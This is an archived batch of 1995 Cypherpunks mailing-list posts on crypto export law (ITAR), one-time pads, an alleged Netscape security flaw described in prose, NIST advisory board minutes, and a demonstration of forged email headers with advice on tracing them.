Drat ... I don't think that I'll be able to attend.  I've already got
a local presentation that I've pencilled in for tomorrow morning at
some god awfully early hour.  Then again, D.C. isn't quite my circuit.

I was hoping though for some clarification.  Are you THE Dr. Frederick
B. Cohen??  The one who originally coined the phrase "computer virus"
and who maintains the computer virus FAQ?

Are you THAT Dr. Frederick B. Cohen, and are you speaking publically
in Washington, tommorow as one of the keynote speakers?

If you are, I'd be interested as to whether you'll talk about the
recent gaping security hole in the existing installed Navigator code
base which I detailed to this list's subscribers. 

The one posted this last Friday the Thirteenth, that questioned
Netscape's wisdom in creating an experimental MIME object which does
not follow the usual HTTP request/response paradigm, but instead
allows a server to open and maintain a bi-directional communications
channel from server to client.

Effectively a non-password protected telnet into the heart of any
system, a open exploitable connection which penetrates proxy servers
and firewalls, and acts as an enhanced bi-directional
delivery/recovery mechanism?

I'd be very interested in the comments around that, especially since both
Netscape and AT&T (who distributes the softwre under its own brand name) 
have made an explicit "no comment".

I'd especially be interested in any post-session transcript. 

I also think that Elaine Garzarelli might be interested.  Especially since
she'll be addressing the nation and the public via the public television
airwaves this Friday evening. 

Or at least ... uhmmm ... I _think_ that's when her electronic daytimer
has her pencilled in ...




Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Wed, 8 Nov 1995 17:35:34 +0800
To: cypherpunks@toad.com
Subject: Re: Crypto++, Cpunk Icons, list noise
Message-ID: <199511070727.XAA06592@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 6 Nov 1995 s1113645@tesla.cc.uottawa.ca wrote:

>> And as the messenger, I (hope) I don't have anything to fear, from the
>> NSA or any other foreign group that would seek to pursue its own agenda
>> within the borders of sovereign Canada.  I really don't think that the
>> NSA is "evil incarnate", as some list subscribers do.  They have their
>> intelligence and know how to use it.  Usually, they use it prudently.
>
>They have a nice friend (the author of Spyworld would say outpost)
>right here in Ottawa at the Communications Security Establishment.

Yes.  I'm well aware of where I can find an Operations Officer, if I need
to.  Locally, in fact.  Don't really have to go to Ottawa, for that. 

(Wrong guess, btw ...)

>They (CSE) seem to have done some recent spying on the opposition
>parties and Quebec separatists (so I vaguely recall having read in
>several places. 

Yes.  At least in this part of the country, we're relatively ho-hum (big
yawn) about scouts and scouting.  Part of the territory, I guess. 

We're Canadian.  We're civilized about these things.

>If you're ever in town, they're just a bit past Carleton U. on Heron. 
>(it doesn't say CSE on the signs, but the guy at the gate will tell you so)

Thanks.

Personally, I'm much more interested in the Museum of Civilization.




Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Thu, 9 Nov 1995 05:33:52 +0800
To: Adam Shostack <adam@lighthouse.homeport.org>
Subject: Re: using pgp to make an otp
In-Reply-To: <199511070407.XAA04557@homeport.org>
Message-ID: <199511070431.XAA17598@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


> 	PGP output is not random enough to be used for a one time pad.
> The security of a OTP is *entirely* based on the quality of the random
> numbers; they should come from some strong generator.  Building good
> one time pads is tough, and usually not worth the effort.

No, however the output of "pgp +makerandom=XXX filename.dat" _IS_
random enough for an OTP.  The problem then becomes distributing this
data.

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Thu, 9 Nov 1995 05:37:26 +0800
To: cypherpunks@toad.com>
Subject: Re: Exporting software doesn't mean exporting (was: Re: lp ?)
In-Reply-To: <199511070400.XAA14905@jekyll.piermont.com>
Message-ID: <9511070433.AA11349@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>Were that the case, citizens couldn't sue to have provisions impacting
>them enforced, but the fact of the matter is that they can.

Various treaties provide that various privilleges will be granted to various 
citizens of the countries concerned. Do the treaties grant such privilleges in 
this case? Just because there is a treaty on nuclear disarmament between the US 
and the USSR does not mean that you as a private citizen can press for 
enforcement through the courts if you think that the USSR is not performing.


>> Perry's somewhat offensive language is not a substitute for an argument.

>Thank you for the ad hominem.

Perry used the phrase "lobotomized mongoloid judge" I think that this
type of language is offensive and unnecessary.

Ad hominem is a perfectly valid form of argument where one is considering
the reputation of the person making the statement. I don't think that 
the type of language and tactics Perry uses reflect well upon him. What is
"I am starting to have trouble believing you are a lawyer." if not ad 
hominem in any case?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 9 Nov 1995 05:42:30 +0800
To: cypherpunks@toad.com
Subject: CSSPAB June 1995
Message-ID: <199511070540.GAA27604@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain




URL: http://csrc.ncsl.nist.gov/csspab/minutes.695


[Reformatted for easier reading]


                       MINUTES OF THE
                JUNE 7-8, 1995 MEETING OF THE
     COMPUTER SYSTEM SECURITY AND PRIVACY ADVISORY BOARD

Wednesday, June 7, 1995

Introduction

A quorum being present, the Chairman, Dr. Willis Ware, called
the meeting to order at 9:00 a.m. at the National Institute of
Standards and Technology (NIST), Gaithersburg, Maryland.
Besides Dr. Ware, the following Board members were present: 
Charlie Baggett Jr., Genevieve Burns, Cris Castro, Don
Gangemi, Sandra Lambert, Joseph Leo, Henry Philcox, Randy
Sanovic, Linda Vetter, Steve Walker, and Bill Whitehurst.

Mr. Ed Roback, Board Executive Secretary and newly appointed
Designated Federal Official, discussed some of the handouts
provided to the Board.  Most important, was a copy of a draft
House bill referred to as the "Department of Commerce
Dismantling Act."  If enacted, part of NIST would be
transferred to the National Science Foundation.  The Commerce
Program Resolution Agency (CPRA) would be established and
attempt to sell NIST laboratories (and other specified
elements of the Department of Commerce) to the private sector. 
If not sold within 18 months of enactment, CPRA would submit
their recommendations to Congress on the appropriate
disposition of the property and functions of the laboratories.


OMB Circular A-130, Appendix III Update and Review of Comments
and "NII Security: The Federal Role" 

Mr. Ed Springer of the Office of Information and Regulatory
Affairs, Office of Management and Budget (OMB), updated the
Board on the recently signed Paperwork Reduction Act of 1995.
(Copies are available for distribution to the Board.)  (ACTION
- SECRETARY).  Mr. Springer said that security remains a
concern and is supported by strong language in the law
requiring agencies to secure their systems. Mr. Springer
updated the Board on Appendix III to OMB Circular A-130. 
Since his briefing to the Board in March, the comment period
for the proposed changes to Appendix III has closed.  OMB
received twenty-nine written comments to date. He solicited
Board members for their reactions to the draft proposal.  Mr.
Springer was asked how OMB will enforce the requirements of
Appendix III.  He said enforcement comes through oversight and
the budget process. There is a sharper focus on where agencies
can go for help. One Board member asked if OMB plans to
develop a standard set of behaviors.  Mr. Springer replied
that OMB will not go that far; however, Appendix III addresses
the risks for agencies to use as a guideline for security
considerations.  Board members noted that agency visits to
senior management regarding security plans, as was conducted
in the 1989-1990 timeframe, seemed successful.  Mr. Springer
said that the Federal Managers Financial Integrity Act
provides oversight of the requirement for agencies to prepare
new plans.  Mr. Springer agreed to brief the Board at its
September meeting to further discuss the comments received and
current status.  He mentioned that the final document "NII
Security: The Role of Federal Government," would be out soon
and Board members would receive copies.  (ACTION - SECRETARY).


Defensive Information Warfare & Unclassified Government and
Private Sector

Mr. Martin Hill, Deputy Director for Information Warfare
Programs, Office of the Assistant Secretary of Defense,
briefed the Board on Information Warfare (IW) from a DoD
perspective. He said that commanders should not depend on
information and information systems that they cannot rely on. 
He used the example of Desert Storm, which was a won through
the use of intelligence; Iraq, in effect, lost the war before
it even began.  Mr. Hill said that IW is driven by daily
attacks on U.S. computer networks.  The national security
construct is changing because DoD utilizes commercial sector
security and shares their vulnerabilities.  The DoD
unclassified definition of IW is "Actions taken to achieve
information superiority in support of national military
strategy by affecting adversary information and information
systems while leveraging and protecting our information and
information systems."  Some of the areas that need defending
are: leadership; command facilities; integrated air defense
and controls; computers, software, data bases, and displays;
power production sources; and links to media. The U.S. IW
strategy is to:

-  Use U.S. technological superiority to provide the right
   information to the right place at the right time,

-  Aggressively defend against attacks on our information, and

-  Use offensive techniques to attain and maintain information
   superiority.

Mr. Hill also emphasized the need for and importance of
training.  He said they have assembled "Red Teams" made up of
DoD personnel that converge on other DoD systems to determine
their vulnerabilities.  When asked how DoD could best
communicate their requirements to the commercial sector, Mr.
Hill said that they conduct seminars and "war games" which are
both attended by industry.  (See Reference #1.)


X/Open Security Branding Proposal

Mr. Peter Callaway, Senior Security Technologist for IBM,
provided the Board with an update on the X/Open security
branding proposal.  Mr. Callaway was speaking from three
perspectives: IBM (a member of X/Open), X/Open, and as a user. 
He said that X/Open feels they have the appropriate and proven
experience by setting industry standards and performing
conformance branding.  X/Open has the commitment of vendors to
build products to their specifications with regard to
technical plans established with vendor cooperation and
commitment to product follow-through.  X/Open Branding is a
certification scheme for conformance verification, not
evaluation. Currently, X/Open branding requires evidence of
successful execution of a test suite where appropriate test
suites are available.  It requires a conformance statement
questionnaire and a trademark license agreement to be
completed by the applicant.  (See Reference # 2.)


Security Policy Board (SPB) Update

Ms. Vicki LaBarre, Security Policy Board (SPB) Staff, briefed
the Board on the progress of the SPB.  Ms. LaBarre reminded
the Board of the role of the SPB as chartered by Presidential
Decision Directive (PDD)-29.  The SPB and Security Policy
Forum are jointly chaired by DoD and intelligence community
members, but their members include non-DoD and
non-intelligence community representatives. Ms. LaBarre
relayed that the SPB considers itself an "honest broker" to
identify issues and positions from all parties on key
questions.  She said that the fundamental question is whether
the executive branch needs a single, consolidated INFOSEC
policy making mechanism.

If a consolidated INFOSEC policy making mechanism is needed: 
Can the existing SPB structure created by PDD-29 meet that
need?

-  If yes: how should an information systems security
   committee be chartered and constituted?

-  If not: how could/should the SPB/SPF be modified to become
   an effective INFOSEC policy mechanism?  What other existing
   entity in the executive branch could act, or be modified to
   act as the executive branch's INFOSEC policy making
   apparatus?  What kind of new entity could be created to
   meet this policy making need?

If a consolidated INFOSEC policy making mechanism is not
needed:

-  How can the existing INFOSEC policy and advisory boards,
   committees, forums, etc., be made to more effectively
   identify, prioritize, resource and act on major INFOSEC
   issues and vulnerabilities affecting the national interest?

-  Are executive branch INFOSEC resources adequate to provide
   for acceptable security for government information systems?

-  Are existing INFOSEC resources appropriately located and
   distributed within the executive branch?

Recently the SPB staff convened a special working group to
draft a resolution to call for compiling a list of major
INFOSEC issues.  The matter will be discussed at the Security
Policy Board Forum meeting on June 23.  In summary, Ms.
LaBarre emphasized that we must to do a better job of INFOSEC
governmentwide which is doable if everyone works together for
the common good.

Throughout Ms. LaBarre's presentation, some Board members
expressed serious concerns about many aspects of the SPB's
charter, the first SPB staff report and their present stance
on the effort of a single policy making mechanism.  Some Board
members expressed the view that the initial report was not
clear with regard to what kind of information would encompass
"national interest." She said that the first report was purely
a "think piece" to stimulate discussion, which it has done.
(See Reference #3.)


Commercial Key Escrow Update

Mr. Steve Walker, President, Trusted Information Systems
(TIS), presented the Board with an update of TIS' Commercial
Key Escrow (CKE) activities.  Mr. Walker recently met with
senior management of National Semiconductor Corporation.  They
discussed a proposal to use CKE in an escrowing approach
called Commercial Automated Key Escrow (CAKE) in which the CKE
system has been modified to work with National's PersonaCard
cryptographic hardware tokens. Mr. Walker believes that this
approach meets the needs expressed by the Vice President. 
CAKE does the following:

1. It removes all very strong cryptography from software.

2. It uses these special CAKE tokens to automatically escrow
   an encrypted copy of every message key within the message
   envelope itself, in a special Data Recovery Field (DRF)
   consisting of the message key and Data Recovery Center
   (DRC) and token identifiers, encrypted with the public key
   of a Designated DRC.

3. It provides access to DRFs via the private key of the DRCs,
   and allow any user to establish their own DRC to safeguard
   corporate information.

4. It uses well known cryptographic algorithms such as DES,
   triple DES and RSA, instead of algorithms such as Skipjack.

5. Finally, it gives American computer and communications
   industries the ability to easily export strong and very
   strong encryption as part of their information highway
   products.

Mr. Walker briefly discussed the software binding issue which
have been put off by implementation into the PCMCIA card but,
it still needs to be tried and a software vendor is being
sought to do so.  The card implementation is aimed at files
and e-mail, not telephony.  There is initial concern with
regard to cost, however, it is tamper proof and cannot be
distributed over the Internet.  Mr. Walker said they are
seeking export approval with DES and CKE and hopes for a
position resolution in the near future. (See Reference #4.)

The meeting recessed at 5:20 pm.




Thursday, June 8, 1995

SI-PMO Action Plan Briefing

Mr. Al Williams, Acting Director of the Security
Infrastructure Program Management Office (SI-PMO) at GSA,
updated the Board on the activities and progress of the
SI-PMO.  He discussed some of the near term goals: identifying
and resolving critical policy issues related to support
multiple technologies, developing a security architecture,
defining user-to-user and user-to SI specifications, and
establishing a formal liaison between the SI-PMO and the
Canadian Government.  Board members asked about milestones. 
Mr. Williams directed members to the summary of the near-term
actions and milestones in the Action Plan appendix.  When
asked who has received the Action Plan, Mr. Williams replied
that it was distributed to the Government Information
Technology Services Group, the National Information
Infrastructure Security Issues Forum, the Electronic Commerce
Acquisition Program Management Office, the E-Mail Program
Management Office, NSA, NIST, and the PKI Steering Committee.
The Board commended Mr. Williams for working an issue with a
real time frame.  Mr. Williams was invited to come back and
update the Board as he feels appropriate.  (See Reference #5.)


Common Criteria Update

Dr. Stu Katzke, Chief, NIST Computer Security Division,
updated the Board on the Common Criteria (CC) effort.  He
discussed the Common Criteria for Information Technology
Security Evaluation workshop on May 11-12 in Ottawa, Canada. 
Approximately 40 people from Europe, Canada, the U.S., and
Japan participated in the workshop.  The workshop served to
allow the CC Editorial Board to:

-  provide general information on the comments received and
   the planned changes to the document based on these
   comments; and

-  receive added clarifications on the reviewers' comments on
   the document so they can update the document to reflect the
   expert opinions.

The number of assurance levels and where they are were
discussed; however, that issue is not as high on the list as
the six key global issues below:

1. Document Organization - understandability and usefulness;

2. Extensibility of Requirements - support of ITSEC is
   unclear;

3. Extensibility of CC - how to maintain the CC;

4. Protection Profile - relationship unclear;

5. Protection Profile - selection of requirements; and

6. Dependencies and Binding - completeness/correctness.

Dr. Katzke said that the NCSC plans to perform evaluation
trials by January of 1996.  (See Reference #6.)  Mr. Charlie
Baggett volunteered to brief the Board in September  on trial
evaluations.  (ACTION - SECRETARY AND MR. BAGGETT.)

The discussion then turned to the Board's March resolution
(95-2) which recommended to NIST and NSA that a statement be
made regarding the equivalence of C2-level evaluated products. 
Mr. Lou Giles of NSA briefed the Board on NIST and NSA's
response to that recommendation.  In July, NIST and NSA will
publicly clarify the relationship between TCSEC C2, ITS EC E2,
and CTCPEC T1 levels to encourage federal programs with
requirements for evaluated low assurance level products to use
trusted products evaluated at these levels.  NIST and NSA 
will publish a Bulletin in July 1995, which will describe a
structure for the selection and acceptability of these
products.  The Bulletin will include an appendix listing the
products evaluated  and in evaluation under each criteria. 
(See Reference #7.)

Mr. Giles used the phrase "selection preferences for C2
requirements."  Some Board members said that the word
preference takes away from equivalency and they are concerned
that the list of requirements is a preference list rather than
a menu.  Selection preferences for C2 requirement are
as follows:

-  C2 products on U.S. EPL;

-  Products under U.S. TCSEC Evaluation (C2);

-  FPC2/T1 products on Canadian EPL or
   FC2/E2 products on European EPL; and

-  Products under CTCPEC (FPC2/T1) or ITSEC (FC2/E2)
   Evaluation.

Some Board members are concerned that the list suggests that
U.S. products be used first, thereby implying that they are
better than other products.  In discussion, most Board members
recommended they order the products in rank of completed vs
non-completed.

Mr. Giles updated TTAP accomplishments.  To date the work
group has performed the following:

-  Drafted an SOW for TTAP Developmental Commercial Evaluation
   (Feb. 95);

-  Annotated outline for document on what it takes to be
   accredited under NVLAP (Mar. 95);

-  Drafted first suggested evaluator actions for TCSEC Class
   C2 provided to NVLAP for review (Apr. 95);

-  Drafted second suggested evaluator actions for TCSEC Class
   C2 (May 95); and

-  Drafted first Technical Review Board expectations of a team
   (May 95).

Future activities for TTAP include:

-  Contract for TTAP Developmental Commercial Evaluation
   (Jun/Jul 95);

-  Start TTAP Developmental Commercial Evaluation (Aug. 95);

-  Conduct lessons learned from contracted effort (May 96);
   and

-  Expect NVLAP to accredit several Labs (NLT Aug. 96).  (See
   Reference #8.)


Privacy Update [Statement by Mr. Robert Gellman omitted]


Discussion

During discussion time, Board members voted on and unanimously
approved the minutes of the March, 1995 meeting.

The Board engaged in a lengthy discussion concerning PDD-29
and the intent of the charter of the SPB.  Board members
debated the idea of a single policy focal point.  They also
debated the phrase in PDD-29 "National Security."  One Board
member reminded the Board of a Government Computer News
article that PDD-29 appears to be clouded as to whether the
PDD intended to include sensitive unclassified information in
addition to national security (i.e., classified/Warner
Amendment) information.  A motion was moved and seconded
directing the chairman to draft a letter to the Co-Chairs of
the SPB and the SPF, articulating the need for clarification
of PDD-29 and the SPB charter.  (ACTION-CHAIRMAN AND
SECRETARY.)


PKI Steering Committee Activities

Mr. Robert Rosenthal, Manager, NIST Protocol Security Group,
briefed the Board on the activities of the Public Key
Infrastructure (PKI) Steering Committee.  Three working groups
reside under the Committee: technical (chaired by IRS),
business and legal (chaired by Treasury), and users (chaired
by the SI-PMO).  The Steering Committee continues to liaise
with the Canadian and Swedish governments, the Internet
community, the American Bankers and American Bar Associations
and the U. S. Council for International Business.  The
Steering Committee is exploring the establishment of a
Cooperative Research and Development Agreement (CRDA) with
industry organizations to:

-  Research and Develop a PKI Interoperability Test Plan and
   a NIST PKI Test Facility;

-  Publish test procedures and lessons learned; and

-  Develop and Demonstrate Interoperable Certificate Services
   on a wide variety of Internetworked Communications
   Facilities.

Mr. Rosenthal said there are workshops and special projects
slated for the future to include a tri-sponsored PKI
Invitational Workshop Series by NIST, the Security
Infrastructure Program Management Office and MITRE.  Also
planned, are some interdivision projects such as: PKI, time
and attendance, travel, procurement, and others that will be
available on the "NISTNET." NISTNET is a campus-wide local
area network for NIST.  (See Reference #9.)


DISA/ARPA/NSA Memorandum Of Understanding Briefing

Mr. John Davis, Director, NSA's National Computer Security
Center, briefed the Board on the Memorandum Of Understanding
(MOU) between the Defense Information Systems Agency (DISA),
the Advanced Research Projects Agency (ARPA), and the National
Security Agency (NSA).  He said that ARPA and NSA are the
major INFOSEC research programs in government and the major
user of INFOSEC is DISA.  The Information Systems Security
Research Joint Technology Office was established by a
Memorandum Of Agreement (MOA) in March of 1995 and signed by
the Directors of ARPA/DISA/NSA to coordinate security research
efforts with a heavy reliance upon commercial technology.  The
following nine items were called out in the agreement: 1)
Strategic Planning, 2) Review and Coordinate, 3) Evaluate
Proposals, 4) Metrics, 5) Prototypes, 6) COTS, 7) Standards,
8) Crypto and 9) Public.  Mr. Davis said this is work in
progress and they are looking for useful results.  Vendors
will show their products at the NIST/NCSC National Information
Systems Security Conference (NISSC) in Baltimore in
October.  Mr. Davis stated that the intent is not to focus
only on DoD.  A Defense solution would be costly, therefore,
commercial products with built in security are needed.  (See
Reference #10.)


Public Comment [Omitted]












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lee Tien <tien@well.com>
Date: Wed, 8 Nov 1995 01:45:26 +0800
To: cypherpunks@toad.com
Subject: Re:  forging headers (with more header information)
Message-ID: <199511071708.JAA25692@well.com>
MIME-Version: 1.0
Content-Type: text/plain



My apologies.  I followed Tim's advice and turned on verbose headers, and
this is what I got.

Lee


Return-Path: freeh@fbi.gov
Received: from nimitz.MIT.EDU (NIMITZ.MIT.EDU [18.80.0.161]) by well.com
(8.6.12/8.6.12) with SMTP id NAA20123 for <tien@well.sf.ca.us>; Tue, 24 Oct
1995 13:06:23 -0700
From: freeh@fbi.gov
Message-Id: <199510242006.NAA20123@well.com>
Received: from sgigate.SGI.COM by nimitz.MIT.EDU with SMTP
        (1.37.109.4/16.2) id AA00301; Tue, 24 Oct 95 16:07:08 -0400
Date: Tue, 24 Oct 95 16:07:08 -0400
Apparently-To: tien@well.sf.ca.us
X-UIDL: 814570964.056

> How difficult is it to forge headers?  How difficult is it to trace a
> message to the actual sender if the header is forged?

Not very difficult at all (to forge, that is).  This is a quick and dirty
example that should be somewhat traceable.  If you want pointers on how to
trace it, post the whole thing, including headers, to cypherpunks.

Louis





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cjs@netcom.com (cjs)
Date: Wed, 8 Nov 1995 02:04:48 +0800
To: cypherpunks@toad.com
Subject: Sign my own certificates?
Message-ID: <199511071736.JAA29605@netcom20.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Oh jesus, I need to get myself a certificate for the netscape servers
at work.

All I need are three forms of identification, two written letters, an
authorized signature, $300, mailed and faxed, along with an e-mail
or two.

I think this is an amazing pain in the ass. Any way I could sign a
certificate by myself for myself and have it work with the netscape
products? 

Just curious,
Christopher





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 8 Nov 1995 05:28:16 +0800
To: cypherpunks@toad.com
Subject: CYB_lip
Message-ID: <199511071543.KAA24880@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   11-7-95. Washrag:

   "Cyber Liberation."

      The future of American politics is being decided in
      semiconductor plants in Santa Clara, in the cluttered
      offices of all-night software designers in Redmond, and,
      of course, all over the Internet. "At some point in the
      not-very-distant future," says Newt Gingrich, "somebody
      is going to have encryption you can't break....
      Governments are not going to be able to stop it."

      This brave new world is closer than you think. It will
      drastically change the focus of politics because control
      will be extremely difficult, if not impossible. We're on
      the brink of a revolution that will make what the
      Republicans are doing this year look trivial beyond
      belief.

      The Internet has the potential to set us free -- to
      learn anything and do anything, whenever we want. No
      wonder politicians want to regulate it to death.

   CYB_lip  (7 kb)













From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 8 Nov 1995 00:02:39 +0800
To: cypherpunks@toad.com
Subject: NOT_nok
Message-ID: <199511071547.KAA25224@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   11-7-95. W$J, Page One lead:

   "The 'Intranet'. Internet Software Poses Big Threat to
   Notes, IBM's Stake in Lotus."

      Hundreds of firms are achieving similar groupware
      linkups with simpler, cheaper systems on the World Wide
      Web. Dubbed "Intranets," these private networks combine
      text, graphics and even video to distribute news, answer
      employee questions, update personnel records and connect
      far-flung workers. The Intranets link a total of about
      15 million workers. These private networks are far
      different from what most Internet fans see -- the public
      "home pages." These setups reside on company-controlled
      servers shielded from the public Web by a security
      "firewall."

      The Web has an "open" design that all programming
      developers can use in common, as opposed to the "closed"
      and proprietary designs of Lotus Notes, Novell's
      Groupwise and Microsoft's Exchange. That lets Intranets
      accept traffic from incompampatible computers more
      readily, making it easier for customers and suppliers to
      tap in, and for users to draw data from old mainframes
      and minicomputers.

   NOT_nok  (10 kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 8 Nov 1995 00:13:07 +0800
To: hallam@w3.org
Subject: Re: Exporting software doesn't mean exporting (was: Re: lp ?)
In-Reply-To: <9511070433.AA11349@zorch.w3.org>
Message-ID: <199511071551.KAA16700@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



hallam@w3.org writes:
> 
> >Were that the case, citizens couldn't sue to have provisions impacting
> >them enforced, but the fact of the matter is that they can.
> 
> Various treaties provide that various privilleges will be granted to
> various citizens of the countries concerned. Do the treaties grant
> such privilleges in this case? Just because there is a treaty on
> nuclear disarmament between the US and the USSR does not mean that
> you as a private citizen can press for enforcement through the
> courts if you think that the USSR is not performing.

No, but treaties permitting citizens of Canada to work in the U.S. are
enforceable in U.S. courts, and other similar treaties that have
personal impact are enforceable in court, such as tax treaties.

In the case of a treaty saying "you aren't breaking a third country's
laws if you transmit something that wouldn't be legal to say in that
country over its telecom lines", its a personal rather than a national
impact and it could be enforced in a U.S. court.

> >> Perry's somewhat offensive language is not a substitute for an argument.
> 
> >Thank you for the ad hominem.
> 
> Perry used the phrase "lobotomized mongoloid judge" I think that this
> type of language is offensive and unnecessary.

To whom was I being offensive, Mr. Hallam, given that I was refering
to a theoretical non-extant personage? Or are you a charter member of
"lobotomized mongoloids for equal justice" or some such.

> Ad hominem is a perfectly valid form of argument where one is considering
> the reputation of the person making the statement.

Yes, but my reputation is irrelevant to whether or not you can be
prosecuted as a foreigner for the act of handing another foreigner
cryptographic software outside the U.S.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Wed, 8 Nov 1995 01:32:58 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: Exporting software doesn't mean exporting (was: Re: lp ?)
In-Reply-To: <Pine.SUN.3.91.951107102406.21752D-100000@viper.law.miami.edu>
Message-ID: <m0tCrCj-0004JWC@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


Michael Froomkin writes:

: I am delighted to discover that there is a person in this world who reads 
: the ITAR more broadly than I do.  I can see how the ITAR could be read to 
: reach a Frenchman who sends crypto via email to a German that happens, 
: through no fault of his own, to be routed via New York; we might have to 
: talk about whether the scienter requirment would mean that M. Frenchman 
: knew or should have known about the routing.  [NB "could be read" does 
: not equal "should be read".]
: 
: Not even I, however, would imagine that any court anywhere, could read 
: the ITAR or the legislation authorizing it (which is more to the point) 
: as reaching two foreigners talking abroad, neither of whom is a US person.

I quite agree that no one can read the Arms Control Export Act as
authorizing the definition of export in the ITAR that requires, among
other things, that a foreign person get a license that the ACEA says
that he can't get, before discloing cryptographic software to another
foreign person ``in the United States or abroad''.

The ITAR violates not only the first amendment to the United States
Constitution, it also violates the separation of powers doctrine.  But
it still says what it says.  (And that is why it is unconstitutional.)

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Koning               1695 <pkoning@chipcom.com>
Date: Wed, 8 Nov 1995 01:32:15 +0800
To: Cypherpunks mailing list <cypherpunks@toad.com>
Subject: Re: using pgp to make an otp
Message-ID: <309FBAB3@mailer2>
MIME-Version: 1.0
Content-Type: text/plain



Will it ever sink in that NO algorithm produces a "random" bitstring, and
therefore NO algorithm can be the driver of a one time pad?

The output of an algorithm is (at best) PSEUDOrandom.  While a stream
cypher constructed that way may be strong, it is NOT a one time pad and
does NOT share with one time pad the unique property of being absolutely
unbreakable from first principles.  (It may very well have the property that
it is too hard to break in practice -- if so it makes a useful cryptosystem.
But to call such a thing "OTP" indicates a fundamental misunderstanding.)

See the sci.crypt FAQ for more details.

     paul

 ----------
From: owner-cypherpunks
To: Adam Shostack
Cc: Alan.Pugh; cypherpunks
Subject: Re: using pgp to make an otp
Date: Monday, November 06, 1995 11:31PM

>       PGP output is not random enough to be used for a one time pad.
> The security of a OTP is *entirely* based on the quality of the random
> numbers; they should come from some strong generator.  Building good
> one time pads is tough, and usually not worth the effort.

No, however the output of "pgp +makerandom=XXX filename.dat" _IS_
random enough for an OTP.  The problem then becomes distributing this
data.

 -derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David E. Smith" <dsmith@cdale1.midwest.net>
Date: Wed, 8 Nov 1995 02:46:32 +0800
To: tien@well.com
Subject: Re:  forging headers (with more header information)
Message-ID: <43796.dsmith@[204.248.40.2]>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 7 Nov 1995 09:08:39 -0800, Lee Tien wrote:
>Return-Path: freeh@fbi.gov
>Received: from nimitz.MIT.EDU (NIMITZ.MIT.EDU [18.80.0.161]) by well.com
>(8.6.12/8.6.12) with SMTP id NAA20123 for <tien@well.sf.ca.us>; Tue, 24 Oct
>1995 13:06:23 -0700
>From: freeh@fbi.gov
>Message-Id: <199510242006.NAA20123@well.com>
>Received: from sgigate.SGI.COM by nimitz.MIT.EDU with SMTP
>        (1.37.109.4/16.2) id AA00301; Tue, 24 Oct 95 16:07:08 -0400
>Date: Tue, 24 Oct 95 16:07:08 -0400
>Apparently-To: tien@well.sf.ca.us
>X-UIDL: 814570964.056

Without having any access to anything but the headers, it looks like
you are an employee for SGI and sent the message from there.

Look at the last Received: header.  It went from sgi.com to mit.edu to
well.com and then to you.

Dave
----- David E. Smith, c/o Southeast Missouri State University
1210 Towers South, Cape Girardeau MO USA 63701-4745
+1(314)339-3814, "dsmith@midwest.net", PGP ID 0x92732139
http://www.midwest.net/scribers/dsmith/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Wed, 8 Nov 1995 01:40:48 +0800
To: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Subject: Re: Exporting software doesn't mean exporting (was: Re: lp ?)
In-Reply-To: <m0tCrCj-0004JWC@pdj2-ra.F-REMOTE.CWRU.Edu>
Message-ID: <Pine.SUN.3.91.951107120300.21752H-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 7 Nov 1995, Peter D. Junger wrote:

> I quite agree that no one can read the Arms Control Export Act as 
>authorizing the definition of export in the ITAR that requires, among 
>other things, that a foreign person get a license that the ACEA says 
>that he can't get, before discloing cryptographic software to another 
>foreign person ``in the United States or abroad''. 
> 
> The ITAR violates not only the first amendment to the United States 
> Constitution, it also violates the separation of powers doctrine.  But 
> it still says what it says.  (And that is why it is unconstitutional.) >

[Note that this small disagreement between PDJ and me should not obscure 
our larger areas of agreement...]

To reiterate my point in legalese:  any court construing the ACEA would
inevitably read the prohibition on "exporting" to a foreign person as not
applying where the nation lacks jurisdiction.  This is not even a case of
applying a construction to save the constitutionality of the statute
(since it could well take a narrower construction to do that).  It's just
common sense, which courts actually resort to on occasion. 

